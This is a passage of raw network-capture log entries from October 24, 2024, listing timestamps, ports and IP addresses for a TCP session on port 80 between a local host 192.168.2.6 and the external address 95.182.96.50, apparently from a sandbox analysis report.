Oct 24, 2024 13:54:16.278995991 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.279055119 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.279057980 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.279093981 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.279103041 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.279130936 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.279141903 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.279165983 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.279171944 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.279202938 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.279206991 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.279242992 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.279277086 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.279306889 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.279326916 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.279352903 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.280256987 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.280291080 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.280304909 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.280329943 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.280380011 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.280414104 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.280422926 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.280448914 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.280453920 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.280503988 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.280504942 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.280546904 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.280556917 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.280591965 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.280600071 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.280627966 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.280633926 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.280661106 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.280668974 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.280698061 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.280705929 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.280730963 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.280738115 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.280771971 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.280785084 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.280819893 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.280826092 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.280854940 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.280859947 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.280891895 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.280894995 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.280930996 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.280956030 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.280998945 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.281012058 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.281048059 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.281050920 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.281081915 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.281090975 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.281116009 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.281125069 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.281151056 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.281160116 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.281187057 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.281193018 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.281220913 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.281233072 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.281255960 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.281269073 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.281290054 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.281296015 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.281325102 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.281330109 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.281364918 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.281367064 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.281404972 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.281974077 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.282004118 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.282032967 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.282046080 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.282058954 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.282094955 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.282103062 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.282130003 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.282140017 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.282171965 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.282183886 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.282224894 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.282238960 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.282273054 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.282277107 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.282308102 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.282316923 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.282342911 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.282351971 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.282372952 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.282383919 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.282407999 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.282414913 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.282443047 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.282449007 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.282483101 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.282511950 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.282546043 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.282552004 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.282579899 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.282586098 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.282614946 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.282624006 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.282648087 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.282653093 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.282681942 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.282695055 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.282717943 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.282722950 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.282752037 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.282754898 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.282788992 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.282794952 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.282825947 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.282838106 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.282860994 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.282866955 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.282898903 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.282932043 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.282932997 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.321077108 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.321130037 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.321136951 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.321166992 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.321181059 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.321202993 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.321214914 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.321239948 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.321244001 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.321274996 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.321295023 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.321310997 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.321317911 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.321360111 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.394251108 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.394282103 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.394310951 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.394319057 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.394335985 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.394371033 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.394378901 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.394407034 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.394418955 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.394453049 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.394463062 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.394514084 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.394516945 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.394556046 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.394570112 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.394589901 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.394599915 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.394634962 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.395673037 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.395725012 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.395781040 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.395817041 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.395828009 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.395862103 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.395870924 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.395910978 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.395920992 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.395953894 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.395962954 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.396001101 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.396014929 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.396042109 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.396054029 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.396100044 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.396102905 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.396135092 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.396141052 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.396169901 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.396189928 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.396203041 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.396222115 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.396238089 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.396259069 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.396277905 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.396291018 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.396326065 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.396338940 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.396359921 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.396374941 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.396401882 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.396939993 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.396992922 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.396996975 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.397028923 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.397046089 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.397073984 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.397196054 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.397248030 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.397250891 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.397300005 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.397304058 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.397337914 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.397351980 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.397372961 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.397381067 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.397407055 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.397416115 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.397459030 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.397459030 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.397512913 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.397516012 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.397559881 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.397566080 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.397600889 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.397629976 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.397634983 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.397640944 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.397669077 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.397679090 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.397703886 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.397716999 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.397741079 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.397752047 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.397783041 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.397794962 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.397830963 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.397847891 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.397866964 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.397870064 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.397902966 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.397917032 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.397941113 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.397948980 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.397975922 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.397981882 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.398013115 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.398027897 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.398046970 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.398062944 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.398092031 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.398102045 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.398128033 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.398143053 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.398163080 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.398169994 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.398196936 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.398200989 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.398231983 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.398251057 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.398267031 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.398302078 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.398334026 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.398343086 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.398370028 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.398381948 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.398405075 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.398415089 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.398439884 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.398447990 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.398477077 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.398488045 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.398525000 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.436398029 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.436434984 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.436470985 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.436511040 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.436563969 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.436593056 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.436598063 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.436630964 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.436630964 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.436666965 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.436676979 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.436691999 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.436712980 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.509717941 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.509748936 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.509799957 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.509816885 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.509835958 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.509836912 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.509861946 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.509871960 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.509886026 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.509908915 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.509913921 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.509943962 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.509957075 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.509980917 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.509985924 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.510025978 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.510762930 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.510792017 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.510827065 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.510828018 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.510843992 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.510863066 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.510869980 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.510900021 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.510963917 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.511018038 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.511019945 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.511058092 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.511070013 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.511105061 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.511111975 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.511138916 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.511141062 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.511173964 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.511193991 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.511212111 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.511507988 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.511558056 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.511631012 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.511663914 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.511681080 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.511698008 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.511703014 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.511733055 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.511739969 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.511770964 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.511774063 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.511811972 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.511828899 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.511869907 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.511883020 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.511913061 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.511926889 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.511945009 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.511953115 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.511981010 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.511986017 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.512015104 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.512022972 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.512108088 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.512121916 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.512165070 CEST	49714	80	192.168.2.6	95.182.96.50
